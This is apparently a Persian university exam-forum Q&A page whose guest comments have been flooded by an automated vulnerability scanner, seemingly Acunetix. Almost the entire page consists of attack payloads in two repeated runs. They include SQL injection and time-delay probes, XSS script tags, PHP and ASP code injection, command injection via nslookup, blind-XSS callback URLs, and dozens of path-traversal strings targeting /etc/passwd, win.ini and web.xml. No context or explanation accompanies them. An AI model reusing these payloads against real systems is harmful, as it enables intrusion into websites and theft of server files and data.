خانه ایجاد آزمون (ویژه اساتید) درخواست آزمون پشتیبانی اخبار تماس با ما درباره ما

پرسش و پاسخ آزمون ۲۸ مهر

سوالات و مباحث مربوط به آزمون دوم (28 مهر 1395) را در این بخش مطرح نمایید.

تاریخ ارسال: 1395-7-14
200 پاسخ
مهمان 11 مهر 1396 - 15:26

1

مهمان 21 مهر 1396 - 13:56

1

مهمان 21 مهر 1396 - 14:22

response.write(9595200*9056478)

مهمان 21 مهر 1396 - 14:22

'+response.write(9595200*9056478)+'

مهمان 21 مهر 1396 - 14:22

"+response.write(9595200*9056478)+"

مهمان 21 مهر 1396 - 14:22

nR0BlIK3

مهمان 21 مهر 1396 - 14:22

set|set&set

مهمان 21 مهر 1396 - 14:22

${10000266+9999745}

مهمان 21 مهر 1396 - 14:22

$(nslookup NuVHDaFU)

مهمان 21 مهر 1396 - 14:22

&nslookup QsdfQkFX&'\"`0&nslookup QsdfQkFX&`'

مهمان 21 مهر 1396 - 14:22

12345'"\'\");|]*{ <>�''????

مهمان 21 مهر 1396 - 14:22

'"()

مهمان 21 مهر 1396 - 14:22

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

مهمان 21 مهر 1396 - 14:22

1some_inexistent_file_with_long_name.jpg

مهمان 21 مهر 1396 - 14:22

Http://testasp.vulnweb.com/t/fit.txt

مهمان 21 مهر 1396 - 14:22

http://testasp.vulnweb.com/t/fit.txt?.jpg

مهمان 21 مهر 1396 - 14:22

)

مهمان 21 مهر 1396 - 14:22

testasp.vulnweb.com

مهمان 21 مهر 1396 - 14:22

!(()&&!|*|*|

مهمان 21 مهر 1396 - 14:22

^(#$!@#$)(()))******

مهمان 21 مهر 1396 - 14:22

http://testasp.vulnweb.com/t/xss.html?%00.jpg

مهمان 21 مهر 1396 - 14:22

http://hitkC11OT1xHZ.bxss.me/

مهمان 21 مهر 1396 - 14:22

;print(md5(acunetix_wvs_security_test));

مهمان 21 مهر 1396 - 14:22

';print(md5(acunetix_wvs_security_test));$a='

مهمان 21 مهر 1396 - 14:22

";print(md5(acunetix_wvs_security_test));$a="

مهمان 21 مهر 1396 - 14:22

${@print(md5(acunetix_wvs_security_test))}

مهمان 21 مهر 1396 - 14:22

${@print(md5(acunetix_wvs_security_test))}\

مهمان 21 مهر 1396 - 14:22

post-comment-topic

مهمان 21 مهر 1396 - 14:22

post-comment-topic

مهمان 21 مهر 1396 - 14:22

post-comment-topic/.

مهمان 21 مهر 1396 - 14:22

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

مهمان 21 مهر 1396 - 14:23

/www.vulnweb.com

مهمان 21 مهر 1396 - 14:23

'"

مهمان 21 مهر 1396 - 14:23

مهمان 21 مهر 1396 - 14:23

1

مهمان 21 مهر 1396 - 14:23

1

مهمان 21 مهر 1396 - 14:23

Y9C8vIlp

مهمان 21 مهر 1396 - 14:23

-1 OR 2+36-36-1=0+0+0+1 --

مهمان 21 مهر 1396 - 14:23

-1 OR 2+392-392-1=0+0+0+1

مهمان 21 مهر 1396 - 14:23

1'"

مهمان 21 مهر 1396 - 14:23

-1' OR 2+101-101-1=0+0+0+1 --

مهمان 21 مهر 1396 - 14:23

\

مهمان 21 مهر 1396 - 14:23

-1' OR 2+903-903-1=0+0+0+1 or 'iQ2f0pL4'='

مهمان 21 مهر 1396 - 14:23

1����

مهمان 21 مهر 1396 - 14:23

-1" OR 2+340-340-1=0+0+0+1 --

مهمان 21 مهر 1396 - 14:23

@@GT1hN

مهمان 21 مهر 1396 - 14:23

1'"()&%<acx><script>WPZR(9194)</script></acx>

مهمان 21 مهر 1396 - 14:23

if(now()=sysdate(),sleep(18),0)/*'XOR(if(now()=sysdate(),sleep(18),0))OR'"XOR(if(now()=sysdate(),sleep(18),0))OR"*/

مهمان 21 مهر 1396 - 14:23

JyI=

مهمان 21 مهر 1396 - 14:23

(select(0)from(select(sleep(18)))v)/*'+(select(0)from(select(sleep(18)))v)+'"+(select(0)from(select(sleep(18)))v)+"*/

مهمان 21 مهر 1396 - 14:23

'"()&%<acx><script>WPZR(9306)</script></acx>

مهمان 21 مهر 1396 - 14:23

�'�"

مهمان 21 مهر 1396 - 14:23

-1; waitfor delay '0:0:18' --

مهمان 21 مهر 1396 - 14:23

�''�""

مهمان 21 مهر 1396 - 14:23

1_9270

مهمان 21 مهر 1396 - 14:23

-1); waitfor delay '0:0:6' --

مهمان 21 مهر 1396 - 14:23

(select convert(int,CHAR(65)))

مهمان 21 مهر 1396 - 14:23

1 waitfor delay '0:0:6' --

مهمان 21 مهر 1396 - 14:23

3s3lGndu'; waitfor delay '0:0:12' --

مهمان 21 مهر 1396 - 14:23

-1;select pg_sleep(12); --

مهمان 21 مهر 1396 - 14:23

-1);select pg_sleep(18); --

مهمان 21 مهر 1396 - 14:23

-1));select pg_sleep(6); --

مهمان 21 مهر 1396 - 14:23

6a9Hk9by';select pg_sleep(6); --

مهمان 21 مهر 1396 - 14:23

2GLNnSzN');select pg_sleep(6); --

مهمان 21 مهر 1396 - 14:23

52VFL2Pa'));select pg_sleep(12); --

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../etc/passwd

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../../../../../../proc/version

مهمان 21 مهر 1396 - 14:24

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../etc/passwd.jpg

مهمان 21 مهر 1396 - 14:24

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 21 مهر 1396 - 14:24

/../..//../..//../..//../..//../..//etc/passwd.jpg

مهمان 21 مهر 1396 - 14:24

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

مهمان 21 مهر 1396 - 14:24

/etc/passwd

مهمان 21 مهر 1396 - 14:24

%2fetc%2fpasswd

مهمان 21 مهر 1396 - 14:24

/.././.././.././.././.././.././.././../etc/./passwd%00

مهمان 21 مهر 1396 - 14:24

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

مهمان 21 مهر 1396 - 14:24

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

مهمان 21 مهر 1396 - 14:24

..��..��..��..��..��..��..��..��etc/passwd

مهمان 21 مهر 1396 - 14:24

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

مهمان 21 مهر 1396 - 14:24

file:///etc/passwd

مهمان 21 مهر 1396 - 14:24

/\../\../\../\../\../\../\../etc/passwd

مهمان 21 مهر 1396 - 14:24

WEB-INF/web.xml

مهمان 21 مهر 1396 - 14:24

/WEB-INF/web.xml

مهمان 21 مهر 1396 - 14:24

WEB-INF\web.xml

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../windows/win.ini

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../boot.ini

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../windows/win.ini.jpg

مهمان 21 مهر 1396 - 14:24

������������������������������������������������windows��win.ini

مهمان 21 مهر 1396 - 14:24

................windowswin.ini

مهمان 21 مهر 1396 - 14:24

..\..\..\..\..\..\..\..\windows\win.ini

مهمان 21 مهر 1396 - 14:24

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

مهمان 21 مهر 1396 - 14:24

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

مهمان 21 مهر 1396 - 14:24

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

مهمان 21 مهر 1396 - 14:24

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

مهمان 21 مهر 1396 - 14:24

WEB-INF/web.xml

مهمان 21 مهر 1396 - 14:24

WEB-INF\web.xml

مهمان 24 مهر 1396 - 09:32

1

مهمان 24 مهر 1396 - 09:49

response.write(9444616*9649503)

مهمان 24 مهر 1396 - 09:49

'+response.write(9444616*9649503)+'

مهمان 24 مهر 1396 - 09:49

"+response.write(9444616*9649503)+"

مهمان 24 مهر 1396 - 09:49

F19GG3pT

مهمان 24 مهر 1396 - 09:49

set|set&set

مهمان 24 مهر 1396 - 09:49

$(nslookup ROizyNi1)

مهمان 24 مهر 1396 - 09:49

&nslookup QtaGFER9&'\"`0&nslookup QtaGFER9&`'

مهمان 24 مهر 1396 - 09:49

${9999035+10000298}

مهمان 24 مهر 1396 - 09:49

12345'"\'\");|]*{ <>�''????

مهمان 24 مهر 1396 - 09:50

'"()

مهمان 24 مهر 1396 - 09:50

)

مهمان 24 مهر 1396 - 09:50

!(()&&!|*|*|

مهمان 24 مهر 1396 - 09:50

^(#$!@#$)(()))******

مهمان 24 مهر 1396 - 09:50

http://testasp.vulnweb.com/t/xss.html?%00.jpg

مهمان 24 مهر 1396 - 09:50

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

مهمان 24 مهر 1396 - 09:50

1some_inexistent_file_with_long_name.jpg

مهمان 24 مهر 1396 - 09:50

Http://testasp.vulnweb.com/t/fit.txt

مهمان 24 مهر 1396 - 09:50

http://testasp.vulnweb.com/t/fit.txt?.jpg

مهمان 24 مهر 1396 - 09:50

testasp.vulnweb.com

مهمان 24 مهر 1396 - 09:50

http://hitSIa7UMhGah.bxss.me/

مهمان 24 مهر 1396 - 09:50

;print(md5(acunetix_wvs_security_test));

مهمان 24 مهر 1396 - 09:50

';print(md5(acunetix_wvs_security_test));$a='

مهمان 24 مهر 1396 - 09:50

";print(md5(acunetix_wvs_security_test));$a="

مهمان 24 مهر 1396 - 09:50

${@print(md5(acunetix_wvs_security_test))}

مهمان 24 مهر 1396 - 09:50

${@print(md5(acunetix_wvs_security_test))}\

مهمان 24 مهر 1396 - 09:50

post-comment-topic

مهمان 24 مهر 1396 - 09:50

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

مهمان 24 مهر 1396 - 09:50

post-comment-topic

مهمان 24 مهر 1396 - 09:50

post-comment-topic/.

مهمان 24 مهر 1396 - 09:50

/www.vulnweb.com

مهمان 24 مهر 1396 - 09:50

'"

مهمان 24 مهر 1396 - 09:50

مهمان 24 مهر 1396 - 09:51

1

مهمان 24 مهر 1396 - 09:51

1'"()&%<acx><script>9d2z(9544)</script></acx>

مهمان 24 مهر 1396 - 09:51

1'"

مهمان 24 مهر 1396 - 09:51

1

مهمان 24 مهر 1396 - 09:51

\

مهمان 24 مهر 1396 - 09:51

bmFLnecC

مهمان 24 مهر 1396 - 09:51

'"()&%<acx><script>9d2z(9991)</script></acx>

مهمان 24 مهر 1396 - 09:51

1����

مهمان 24 مهر 1396 - 09:51

-1 OR 2+276-276-1=0+0+0+1 --

مهمان 24 مهر 1396 - 09:51

@@cY7UI

مهمان 24 مهر 1396 - 09:51

-1 OR 2+53-53-1=0+0+0+1

مهمان 24 مهر 1396 - 09:51

1_9649

مهمان 24 مهر 1396 - 09:51

-1' OR 2+749-749-1=0+0+0+1 --

مهمان 24 مهر 1396 - 09:51

JyI=

مهمان 24 مهر 1396 - 09:51

-1' OR 2+976-976-1=0+0+0+1 or 'VDEQAOe9'='

مهمان 24 مهر 1396 - 09:51

�'�"

مهمان 24 مهر 1396 - 09:51

-1" OR 2+154-154-1=0+0+0+1 --

مهمان 24 مهر 1396 - 09:51

�''�""

مهمان 24 مهر 1396 - 09:51

if(now()=sysdate(),sleep(21),0)/*'XOR(if(now()=sysdate(),sleep(21),0))OR'"XOR(if(now()=sysdate(),sleep(21),0))OR"*/

مهمان 24 مهر 1396 - 09:51

(select convert(int,CHAR(65)))

مهمان 24 مهر 1396 - 09:51

(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/

مهمان 24 مهر 1396 - 09:51

-1; waitfor delay '0:0:7' --

مهمان 24 مهر 1396 - 09:51

-1); waitfor delay '0:0:14' --

مهمان 24 مهر 1396 - 09:51

1 waitfor delay '0:0:14' --

مهمان 24 مهر 1396 - 09:51

08Mzsdc1'; waitfor delay '0:0:14' --

مهمان 24 مهر 1396 - 09:51

-1;select pg_sleep(14); --

مهمان 24 مهر 1396 - 09:51

-1);select pg_sleep(14); --

مهمان 24 مهر 1396 - 09:51

-1));select pg_sleep(21); --

مهمان 24 مهر 1396 - 09:51

RyTwCBwQ';select pg_sleep(7); --

مهمان 24 مهر 1396 - 09:51

5RDaExOL');select pg_sleep(7); --

مهمان 24 مهر 1396 - 09:51

qfc1qK94'));select pg_sleep(14); --

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../etc/passwd

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../../../../../../proc/version

مهمان 24 مهر 1396 - 09:51

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../etc/passwd.jpg

مهمان 24 مهر 1396 - 09:51

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 24 مهر 1396 - 09:51

/../..//../..//../..//../..//../..//etc/passwd.jpg

مهمان 24 مهر 1396 - 09:51

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

مهمان 24 مهر 1396 - 09:51

/etc/passwd

مهمان 24 مهر 1396 - 09:51

%2fetc%2fpasswd

مهمان 24 مهر 1396 - 09:51

/.././.././.././.././.././.././.././../etc/./passwd%00

مهمان 24 مهر 1396 - 09:51

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

مهمان 24 مهر 1396 - 09:51

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

مهمان 24 مهر 1396 - 09:51

..��..��..��..��..��..��..��..��etc/passwd

مهمان 24 مهر 1396 - 09:51

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

مهمان 24 مهر 1396 - 09:51

file:///etc/passwd

مهمان 24 مهر 1396 - 09:51

/\../\../\../\../\../\../\../etc/passwd

مهمان 24 مهر 1396 - 09:51

WEB-INF/web.xml

مهمان 24 مهر 1396 - 09:51

/WEB-INF/web.xml

مهمان 24 مهر 1396 - 09:52

WEB-INF\web.xml

مهمان 24 مهر 1396 - 09:52

../../../../../../../../../../windows/win.ini

مهمان 24 مهر 1396 - 09:52

../../../../../../../../../../boot.ini

مهمان 24 مهر 1396 - 09:52

../../../../../../../../../../windows/win.ini.jpg

مهمان 24 مهر 1396 - 09:52

������������������������������������������������windows��win.ini

مهمان 24 مهر 1396 - 09:52

................windowswin.ini

مهمان 24 مهر 1396 - 09:52

..\..\..\..\..\..\..\..\windows\win.ini

مهمان 24 مهر 1396 - 09:52

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

مهمان 24 مهر 1396 - 09:52

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

مهمان 24 مهر 1396 - 09:52

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

مهمان 24 مهر 1396 - 09:52

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.